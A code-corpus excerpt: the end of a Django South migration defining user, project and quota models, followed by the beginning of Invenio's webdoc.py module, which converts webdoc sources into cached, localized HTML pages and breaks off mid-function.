'is_consumed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'realname': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'im.pendingthirdpartyuser': {
'Meta': {'unique_together': "(('provider', 'third_party_identifier'),)", 'object_name': 'PendingThirdPartyUser'},
'affiliation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'third_party_identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'im.project': {
'Meta': {'object_name': 'Project'},
'application': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'project'", 'unique': 'True', 'to': "orm['im.ProjectApplication']"}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.BigIntegerField', [], {'primary_key': 'True', 'db_column': "'id'"}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['im.AstakosUser']", 'through': "orm['im.ProjectMembership']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True', 'null': 'True', 'db_index': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'})
},
'im.projectapplication': {
'Meta': {'unique_together': "(('chain', 'id'),)", 'object_name': 'ProjectApplication'},
'applicant': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'projects_applied'", 'to': "orm['im.AstakosUser']"}),
'chain': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'chained_apps'", 'db_column': "'chain'", 'to': "orm['im.Project']"}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateTimeField', [], {}),
'homepage': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'limit_on_members_number': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'member_join_policy': ('django.db.models.fields.IntegerField', [], {}),
'member_leave_policy': ('django.db.models.fields.IntegerField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'projects_owned'", 'to': "orm['im.AstakosUser']"}),
'resource_grants': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['im.Resource']", 'null': 'True', 'through': "orm['im.ProjectResourceGrant']", 'blank': 'True'}),
'response': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'response_actor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'responded_apps'", 'null': 'True', 'to': "orm['im.AstakosUser']"}),
'response_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '0', 'db_index': 'True'}),
'waive_actor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'waived_apps'", 'null': 'True', 'to': "orm['im.AstakosUser']"}),
'waive_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'waive_reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'im.projectlock': {
'Meta': {'object_name': 'ProjectLock'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'im.projectlog': {
'Meta': {'object_name': 'ProjectLog'},
'actor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']", 'null': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'from_state': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'log'", 'to': "orm['im.Project']"}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'to_state': ('django.db.models.fields.IntegerField', [], {})
},
'im.projectmembership': {
'Meta': {'unique_together': "(('person', 'project'),)", 'object_name': 'ProjectMembership'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Project']"}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '0', 'db_index': 'True'})
},
'im.projectmembershiplog': {
'Meta': {'object_name': 'ProjectMembershipLog'},
'actor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']", 'null': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'from_state': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'membership': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'log'", 'to': "orm['im.ProjectMembership']"}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'to_state': ('django.db.models.fields.IntegerField', [], {})
},
'im.projectresourcegrant': {
'Meta': {'unique_together': "(('resource', 'project_application'),)", 'object_name': 'ProjectResourceGrant'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member_capacity': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'project_application': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.ProjectApplication']", 'null': 'True'}),
'project_capacity': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'resource': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Resource']"})
},
'im.resource': {
'Meta': {'object_name': 'Resource'},
'api_visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'desc': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'service_origin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'service_type': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ui_visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'uplimit': ('django.db.models.fields.BigIntegerField', [], {'default': '0'})
},
'im.service': {
'Meta': {'object_name': 'Service'},
'component': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Component']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'im.sessioncatalog': {
'Meta': {'object_name': 'SessionCatalog'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sessions'", 'null': 'True', 'to': "orm['im.AstakosUser']"})
},
'im.usersetting': {
'Meta': {'unique_together': "(('user', 'setting'),)", 'object_name': 'UserSetting'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'setting': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"}),
'value': ('django.db.models.fields.IntegerField', [], {})
},
'quotaholder_app.commission': {
'Meta': {'object_name': 'Commission'},
'clientkey': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'issue_datetime': ('django.db.models.fields.DateTimeField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4096'}),
'serial': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'quotaholder_app.holding': {
'Meta': {'unique_together': "(('holder', 'source', 'resource'),)", 'object_name': 'Holding'},
'holder': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'limit': ('django.db.models.fields.BigIntegerField', [], {}),
'resource': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'null': 'True'}),
'usage_max': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'usage_min': ('django.db.models.fields.BigIntegerField', [], {'default': '0'})
},
'quotaholder_app.provision': {
'Meta': {'object_name': 'Provision'},
'holder': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'quantity': ('django.db.models.fields.BigIntegerField', [], {}),
'resource': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'serial': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'provisions'", 'to': "orm['quotaholder_app.Commission']"}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'null': 'True'})
},
'quotaholder_app.provisionlog': {
'Meta': {'object_name': 'ProvisionLog'},
'delta_quantity': ('django.db.models.fields.BigIntegerField', [], {}),
'holder': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue_time': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'limit': ('django.db.models.fields.BigIntegerField', [], {}),
'log_time': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'reason': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'resource': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'serial': ('django.db.models.fields.BigIntegerField', [], {}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'null': 'True'}),
'usage_max': ('django.db.models.fields.BigIntegerField', [], {}),
'usage_min': ('django.db.models.fields.BigIntegerField', [], {})
}
}
complete_apps = ['im', 'quotaholder_app']
symmetrical = True
| gpl-3.0 |
pamfilos/invenio | modules/webstyle/lib/webdoc.py | 16 | 36364 | # -*- coding: utf-8 -*-
## This file is part of Invenio.
## Copyright (C) 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
WebDoc -- Transform webdoc sources into static html files
"""
__revision__ = \
"$Id$"
from invenio.config import \
CFG_PREFIX, \
CFG_SITE_LANG, \
CFG_SITE_LANGS, \
CFG_SITE_NAME, \
CFG_SITE_SUPPORT_EMAIL, \
CFG_SITE_ADMIN_EMAIL, \
CFG_SITE_URL, \
CFG_SITE_SECURE_URL, \
CFG_SITE_RECORD, \
CFG_VERSION, \
CFG_SITE_NAME_INTL, \
CFG_CACHEDIR
from invenio.dateutils import \
convert_datestruct_to_datetext, \
convert_datestruct_to_dategui, \
convert_datecvs_to_datestruct
from invenio.shellutils import mymkdir
from invenio.messages import \
gettext_set_language, \
wash_language, \
language_list_long
import re
import getopt
import os
import sys
import time
# List of (webdoc_source_dir, webdoc_cache_dir)
webdoc_dirs = {'help':('%s/lib/webdoc/invenio/help' % CFG_PREFIX, \
'%s/webdoc/help-pages' % CFG_CACHEDIR),
'admin':('%s/lib/webdoc/invenio/admin' % CFG_PREFIX, \
'%s/webdoc/admin-pages' % CFG_CACHEDIR),
'hacking':('%s/lib/webdoc/invenio/hacking' % CFG_PREFIX, \
'%s/webdoc/hacking-pages' % CFG_CACHEDIR),
'info':('%s/lib/webdoc/invenio/info' % CFG_PREFIX, \
'%s/webdoc/info-pages' % CFG_CACHEDIR)}
# Regular expression for finding text to be translated
translation_pattern = re.compile(r'_\((?P<word>.*?)\)_', \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# # Regular expression for finding comments
comments_pattern = re.compile(r'^\s*#.*$', \
re.MULTILINE)
# Regular expression for finding <lang:current/> tag
pattern_lang_current = re.compile(r'<lang \s*:\s*current\s*\s*/>', \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <lang:link/> tag
pattern_lang_link_current = re.compile(r'<lang \s*:\s*link\s*\s*/>', \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <!-- %s: %s --> tag
# where %s will be replaced at run time
pattern_tag = r'''
<!--\s*(?P<tag>%s) #<!-- %%s tag (no matter case)
\s*:\s*
(?P<value>.*?) #description value. any char that is not end tag
(\s*-->) #end tag
'''
# List of available tags in webdoc, and the pattern to find it
pattern_tags = {'WebDoc-Page-Title': '',
'WebDoc-Page-Navtrail': '',
'WebDoc-Page-Description': '',
'WebDoc-Page-Keywords': '',
'WebDoc-Page-Header-Add': '',
'WebDoc-Page-Box-Left-Top-Add': '',
'WebDoc-Page-Box-Left-Bottom-Add': '',
'WebDoc-Page-Box-Right-Top-Add': '',
'WebDoc-Page-Box-Right-Bottom-Add': '',
'WebDoc-Page-Footer-Add': '',
'WebDoc-Page-Revision': ''
}
for tag in pattern_tags.keys():
pattern_tags[tag] = re.compile(pattern_tag % tag, \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <lang>...</lang> tag
pattern_lang = re.compile(r'''
<lang #<lang tag (no matter case)
\s*
(?P<keep>keep=all)*
\s* #any number of white spaces
> #closing <lang> start tag
(?P<langs>.*?) #anything but the next group (greedy)
(</lang\s*>) #end tag
''', re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <en>...</en> tag (particular case of
# pattern_lang)
pattern_CFG_SITE_LANG = re.compile(r"<("+CFG_SITE_LANG+ \
r")\s*>(.*?)(</"+CFG_SITE_LANG+r"\s*>)",
re.IGNORECASE | re.DOTALL)
# Builds regular expression for finding each known language in <lang> tags
ln_pattern_text = r"<(?P<lang>"
ln_pattern_text += r"|".join([lang[0] for lang in \
language_list_long(enabled_langs_only=False)])
ln_pattern_text += r')\s*(revision="[^"]"\s*)?>(?P<translation>.*?)</\1>'
ln_pattern = re.compile(ln_pattern_text, re.IGNORECASE | re.DOTALL)
defined_tags = {'<CFG_SITE_NAME>': CFG_SITE_NAME,
'<CFG_SITE_SUPPORT_EMAIL>': CFG_SITE_SUPPORT_EMAIL,
'<CFG_SITE_ADMIN_EMAIL>': CFG_SITE_ADMIN_EMAIL,
'<CFG_SITE_URL>': CFG_SITE_URL,
'<CFG_SITE_SECURE_URL>': CFG_SITE_SECURE_URL,
'<CFG_SITE_RECORD>': CFG_SITE_RECORD,
'<CFG_VERSION>': CFG_VERSION,
'<CFG_SITE_NAME_INTL>': CFG_SITE_NAME_INTL}
def get_webdoc_parts(webdoc,
parts=['title', \
'keywords', \
'navtrail', \
'body',
'lastupdated',
'description'],
categ="",
update_cache_mode=1,
ln=CFG_SITE_LANG,
verbose=0,
req=None):
"""
Returns the html of the specified 'webdoc' part(s).
Also update the cache if 'update_cache' is True.
Parameters:
webdoc - *string* the name of a webdoc that can be
found in standard webdoc dir, or a webdoc
filepath. Priority is given to filepath if
both match.
parts - *list(string)* the parts that should be
returned by this function. Can be in:
'title', 'keywords', 'navtrail', 'body',
'description', 'lastupdated'.
categ - *string* (optional) The category to which
the webdoc file belongs. 'help', 'admin'
or 'hacking'. If "", look in all categories.
update_cache_mode - *int* update the cached version of the
given 'webdoc':
- 0 : do not update
- 1 : update if needed
- 2 : always update
Returns : *dictionary* with keys being in 'parts' input parameter and values
being the corresponding html part.
"""
html_parts = {}
if update_cache_mode in [1, 2]:
update_webdoc_cache(webdoc, update_cache_mode, verbose)
def get_webdoc_cached_part_path(webdoc_cache_dir, webdoc, ln, part):
"Build path for given webdoc, ln and part"
return webdoc_cache_dir + os.sep + webdoc + \
os.sep + webdoc + '.' + part + '-' + \
ln + '.html'
for part in parts:
if categ != "":
if categ == 'info':
uri_parts = req.uri.split(os.sep)
locations = list(webdoc_dirs.get(categ, ('','')))
locations[0] = locations[0] + os.sep + os.sep.join(uri_parts[uri_parts.index('info')+1:-1])
locations = [tuple(locations)]
else:
locations = [webdoc_dirs.get(categ, ('',''))]
else:
locations = webdoc_dirs.values()
for (_webdoc_source_dir, _web_doc_cache_dir) in locations:
webdoc_cached_part_path = None
if os.path.exists(get_webdoc_cached_part_path(_web_doc_cache_dir,
webdoc, ln, part)):
# Check given language
webdoc_cached_part_path = get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, ln, part)
elif os.path.exists(get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, CFG_SITE_LANG, part)):
# Check CFG_SITE_LANG
webdoc_cached_part_path = get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, CFG_SITE_LANG, part)
elif os.path.exists(get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, 'en', part)):
# Check English
webdoc_cached_part_path = get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, 'en', part)
if webdoc_cached_part_path is not None:
try:
webdoc_cached_part = file(webdoc_cached_part_path, 'r').read()
html_parts[part] = webdoc_cached_part
except IOError:
# Could not read cache file. Generate on-the-fly,
# get all the parts at the same time, and return
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
webdoc_source = file(webdoc_source_path, 'r').read()
htmls = transform(webdoc_source, languages=[ln])
if len(htmls) > 0:
(lang, body, title, keywords, \
navtrail, lastupdated, description) = htmls[-1]
html_parts = {'body': body or '',
'title': title or '',
'keywords': keywords or '',
'navtrail': navtrail or '',
'lastupdated': lastupdated or '',
'description': description or ''}
# We then have all the parts, or there is no
# translation for this file (if len(htmls)==0)
break
else:
# Look in other categories
continue
if html_parts == {}:
# Could not find/read the folder where cache should
# be. Generate on-the-fly, get all the parts at the
# same time, and return
dirs = None
if categ == "info":
dirs = locations
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc, dirs=dirs)
if webdoc_source_path is not None:
try:
webdoc_source = file(webdoc_source_path, 'r').read()
htmls = transform(webdoc_source, languages=[ln])
if len(htmls) > 0:
(lang, body, title, keywords, \
navtrail, lastupdated, description) = htmls[-1]
html_parts = {'body': body or '',
'title': title or '',
'keywords': keywords or '',
'navtrail': navtrail or '',
'lastupdated': lastupdated or '',
'description': description or ''}
# We then have all the parts, or there is no
# translation for this file (if len(htmls)==0)
break
except IOError:
# Nothing we can do..
pass
return html_parts
def update_webdoc_cache(webdoc, mode=1, verbose=0, languages=CFG_SITE_LANGS):
"""
Update the cache (on disk) of the given webdoc.
Parameters:
webdoc - *string* the name of a webdoc that can be
found in standard webdoc dir, or a webdoc
filepath.
mode - *int* update cache mode:
- 0 : do not update
- 1 : only if necessary (webdoc source
is newer than its cache)
- 2 : always update
"""
if mode in [1, 2]:
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
if mode == 1 and \
webdoc_source_modification_date < webdoc_cache_modification_date and \
get_mo_last_modification() < webdoc_cache_modification_date:
# Cache was updated after source. No need to update
return
(webdoc_source, \
webdoc_cache_dir, \
webdoc_name) = read_webdoc_source(webdoc)
if webdoc_source is not None:
htmls = transform(webdoc_source, languages=languages)
for (lang, body, title, keywords, \
navtrail, lastupdated, description) in htmls:
# Body
if body is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.body%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
body,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Title
if title is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.title%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
title,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Keywords
if keywords is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.keywords%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
keywords,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Navtrail
if navtrail is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.navtrail%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
navtrail,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Description
if description is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.description%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
description,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Last updated timestamp (CVS timestamp)
if lastupdated is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.lastupdated%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
lastupdated,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Last updated cache file
try:
write_cache_file('last_updated',
webdoc_cache_dir,
convert_datestruct_to_dategui(time.localtime()),
verbose=0)
except IOError, e:
print e
except OSError, e:
print e
if verbose > 0:
print 'Written cache in %s' % webdoc_cache_dir
def read_webdoc_source(webdoc):
"""
Returns the source of the given webdoc, along with the path to its
cache directory.
Returns (None, None, None) if webdoc cannot be found.
Parameters:
webdoc - *string* the name of a webdoc that can be
found in standard webdoc dir, or a webdoc
filepath. Priority is given to filepath if
both match.
Returns: *tuple* (webdoc_source, webdoc_cache_dir, webdoc_name)
"""
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
if webdoc_source_path is not None:
try:
webdoc_source = file(webdoc_source_path, 'r').read()
except IOError:
webdoc_source = None
else:
webdoc_source = None
return (webdoc_source, webdoc_cache_dir, webdoc_name)
def get_webdoc_info(webdoc, dirs=None):
"""
Locate the file corresponding to given webdoc and return its
path, the path to its cache directory (even if it does not exist
yet), the last modification dates of the source and the cache, and
the webdoc name (i.e. webdoc id)
Parameters:
webdoc - *string* the name of a webdoc that can be found in
standard webdoc dirs. (Without extension '.webdoc',
hence 'search-guide', not'search-guide.webdoc'.)
Returns: *tuple* (webdoc_source_path, webdoc_cache_dir,
webdoc_name webdoc_source_modification_date,
webdoc_cache_modification_date)
"""
webdoc_source_path = None
webdoc_cache_dir = None
webdoc_name = None
last_updated_date = None
webdoc_source_modification_date = 1
webdoc_cache_modification_date = 0
locations = webdoc_dirs.values()
if dirs is not None:
locations = dirs
for (_webdoc_source_dir, _web_doc_cache_dir) in locations:
webdoc_source_path = _webdoc_source_dir + os.sep + \
webdoc + '.webdoc'
if os.path.exists(webdoc_source_path):
webdoc_cache_dir = _web_doc_cache_dir + os.sep + webdoc
webdoc_name = webdoc
webdoc_source_modification_date = os.stat(webdoc_source_path).st_mtime
break
else:
webdoc_source_path = None
webdoc_name = None
webdoc_source_modification_date = 1
if webdoc_cache_dir is not None and \
os.path.exists(webdoc_cache_dir + os.sep + 'last_updated'):
webdoc_cache_modification_date = os.stat(webdoc_cache_dir + \
os.sep + \
'last_updated').st_mtime
return (webdoc_source_path, webdoc_cache_dir, webdoc_name,
webdoc_source_modification_date, webdoc_cache_modification_date)
def get_webdoc_topics(sort_by='name', sc=0, limit=-1,
categ=['help', 'admin', 'hacking'],
ln=CFG_SITE_LANG):
"""
List the available webdoc files in html format.
sort_by - *string* Sort topics by 'name' or 'date'.
sc - *int* Split the topics by categories if sc=1.
limit - *int* Max number of topics to be printed.
No limit if limit < 0.
categ - *list(string)* the categories to consider
ln - *string* Language of the page
"""
_ = gettext_set_language(ln)
topics = {}
ln_link = '?ln=' + ln
for category in categ:
if not webdoc_dirs.has_key(category):
continue
(source_path, cache_path) = webdoc_dirs[category]
if not topics.has_key(category):
topics[category] = []
# Build list of tuples(webdoc_name, webdoc_date, webdoc_url)
for webdocfile in [path for path in \
os.listdir(source_path) \
if path.endswith('.webdoc')]:
webdoc_name = webdocfile[:-7]
webdoc_url = CFG_SITE_URL + "/help/" + \
((category != 'help' and category + '/') or '') + \
webdoc_name
try:
webdoc_date = time.strptime(get_webdoc_parts(webdoc_name,
parts=['lastupdated']).get('lastupdated', "1970-01-01 00:00:00"),
"%Y-%m-%d %H:%M:%S")
except:
webdoc_date = time.strptime("1970-01-01 00:00:00", "%Y-%m-%d %H:%M:%S")
topics[category].append((webdoc_name, webdoc_date, webdoc_url))
# If not split by category, merge everything
if sc == 0:
all_topics = []
for topic in topics.values():
all_topics.extend(topic)
topics.clear()
topics[''] = all_topics
# Sort topics
if sort_by == 'name':
for topic in topics.values():
topic.sort()
elif sort_by == 'date':
for topic in topics.values():
topic.sort(lambda x, y:cmp(x[1], y[1]))
topic.reverse()
out = ''
for category, topic in topics.iteritems():
if category != '' and len(categ) > 1:
out += '<strong>'+ _("%(category)s Pages") % \
{'category': _(category).capitalize()} + '</strong>'
if limit < 0:
limit = len(topic)
out += '<ul><li>' + \
'</li><li>'.join(['%s <a href="%s%s">%s</a>' % \
((sort_by == 'date' and time.strftime('%Y-%m-%d', topic_item[1])) or '', \
topic_item[2], \
ln_link, \
get_webdoc_parts(topic_item[0], \
parts=['title'], \
ln=ln).get('title', '')) \
for topic_item in topic[:limit]]) + \
'</li></ul>'
return out
def transform(webdoc_source, verbose=0, req=None, languages=CFG_SITE_LANGS):
"""
Transform a WebDoc into html
This is made through a serie of transformations, mainly substitutions.
Parameters:
- webdoc_source : *string* the WebDoc input to transform to HTML
"""
parameters = {} # Will store values for specified parameters, such
# as 'Title' for <!-- WebDoc-Page-Title: Title -->
def get_param_and_remove(match):
"""
Analyses 'match', get the parameter and return empty string to
remove it.
Called by substitution in 'transform(...)', used to collection
parameters such as <!-- WebDoc-Page-Title: Title -->
@param match: a match object corresponding to the special tag
that must be interpreted
"""
tag = match.group("tag")
value = match.group("value")
parameters[tag] = value
return ''
def translate(match):
"""
Translate matching values
"""
word = match.group("word")
translated_word = _(word)
return translated_word
# 1 step
## First filter, used to remove comments
## and <protect> tags
uncommented_webdoc = ''
for line in webdoc_source.splitlines(True):
if not line.strip().startswith('#'):
uncommented_webdoc += line
webdoc_source = uncommented_webdoc.replace('<protect>', '')
webdoc_source = webdoc_source.replace('</protect>', '')
html_texts = {}
# Language dependent filters
for ln in languages:
_ = gettext_set_language(ln)
# Check if translation is really needed
## Just a quick check. Might trigger false negative, but it is
## ok.
if ln != CFG_SITE_LANG and \
translation_pattern.search(webdoc_source) is None and \
pattern_lang_link_current.search(webdoc_source) is None and \
pattern_lang_current.search(webdoc_source) is None and \
'<%s>' % ln not in webdoc_source and \
('_(') not in webdoc_source:
continue
# 2 step
## Filter used to translate string in _(..)_
localized_webdoc = translation_pattern.sub(translate, webdoc_source)
# 3 step
## Print current language 'en', 'fr', .. instead of
## <lang:current /> tags and '?ln=en', '?ln=fr', .. instead of
## <lang:link />
localized_webdoc = pattern_lang_link_current.sub('?ln=' + ln,
localized_webdoc)
localized_webdoc = pattern_lang_current.sub(ln, localized_webdoc)
# 4 step
## Filter out languages
localized_webdoc = filter_languages(localized_webdoc, ln, defined_tags)
# 5 Step
## Replace defined tags with their value from config file
## Eg. replace <CFG_SITE_URL> with 'http://cds.cern.ch/':
for defined_tag, value in defined_tags.iteritems():
if defined_tag.upper() == '<CFG_SITE_NAME_INTL>':
localized_webdoc = localized_webdoc.replace(defined_tag, \
value.get(ln, value['en']))
else:
localized_webdoc = localized_webdoc.replace(defined_tag, value)
# 6 step
## Get the parameters defined in HTML comments, like
## <!-- WebDoc-Page-Title: My Title -->
localized_body = localized_webdoc
for tag, pattern in pattern_tags.iteritems():
localized_body = pattern.sub(get_param_and_remove, localized_body)
out = localized_body
# Pre-process date
last_updated = parameters.get('WebDoc-Page-Revision', '')
last_updated = convert_datecvs_to_datestruct(last_updated)
last_updated = convert_datestruct_to_datetext(last_updated)
html_texts[ln] = (ln,
out,
parameters.get('WebDoc-Page-Title'),
parameters.get('WebDoc-Page-Keywords'),
parameters.get('WebDoc-Page-Navtrail'),
last_updated,
parameters.get('WebDoc-Page-Description'))
# Remove duplicates
filtered_html_texts = []
if html_texts.has_key(CFG_SITE_LANG):
